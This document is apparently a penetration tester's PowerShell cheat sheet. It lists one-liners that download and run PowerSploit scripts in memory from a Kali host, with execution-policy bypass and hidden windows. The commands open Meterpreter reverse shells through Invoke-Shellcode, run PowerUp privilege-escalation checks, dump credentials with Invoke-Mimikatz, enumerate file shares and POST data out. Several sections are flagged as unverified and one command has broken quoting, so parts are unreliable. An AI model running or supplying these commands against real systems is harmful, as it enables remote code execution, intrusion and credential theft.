PowerShell - How To


# Download from Kali
cd /opt/PowerSploit/Recon/
python -m SimpleHTTPServer

- Windows
cd to a discrete, writable directory (C:\Users\<user>\Desktop)
powershell -nop -exec bypass "IEX (New-Object Net.Webclient).DownloadFile('http://192.168.0.6:8000/PowerView.ps1', 'PowerView.ps1')"
powershell.exe -nop -exec bypass
Import-Module .\PowerView.ps1

# Execute a remote file
powershell -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.6:8000/PowerView.ps1');Get-NetLocalGroup"

# Upload a file (POST)
powershell -nop -exec bypass "IEX (New-Object Net.Webclient).UploadString('http://192.168.0.6/evil.ps1',"<PostDATA>")"
------------------------------------------------------------------------------------------------------------------------------------------------------

# PowerSploit - getting a shell without writing to disk     *** NEED to VERIFY ***

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.0.6
set lport 443
exploit -j

- Open a new tab
cd /opt/PowerSploit/CodeExecution/
python -m SimpleHTTPServer

- Windows
powershell.exe -nop -exec bypass
IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.6:8000/Invoke-Shellcode.ps1')
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.0.6 -Lport 443 -Force
------------------------------------------------------------------------------------------------------------------------------------------------------

# Priv escalation     *** NEED to VERIFY ***

- Load from disk
powershell -nop -exec bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks

- Load from Kali
cd /opt/PowerSploit/Privesc/
python -m SimpleHTTPServer

- Windows
powershell -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.6:8000/PowerUp.ps1');Invoke-AllChecks"

powershell -nop -NonI -w hidden -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.6:8000/Invoke-Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.0.6 -Lport 443 -Force"
------------------------------------------------------------------------------------------------------------------------------------------------------

# Dump creds     *** NEED to VERIFY ***

- Download from Kali
cd /opt/PowerSploit/Exfiltration/
python -m SimpleHTTPServer

- Windows
powershell -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.6:8000/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
------------------------------------------------------------------------------------------------------------------------------------------------------

# Find open fileshares     *** NEED to VERIFY ***

- Download from Kali
cd /opt/PowerSploit/Recon/
python -m SimpleHTTPServer

- Windows
powershell -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.6:8000/PowerView.ps1');Invoke-Netview"
Invoke-ShareFinder -CheckShareAccess

New-PSDrive S -PSProvider FileSystem -Root \\10.0.0.14\SYSVOL
PSDrive
Remove-PSDrive S

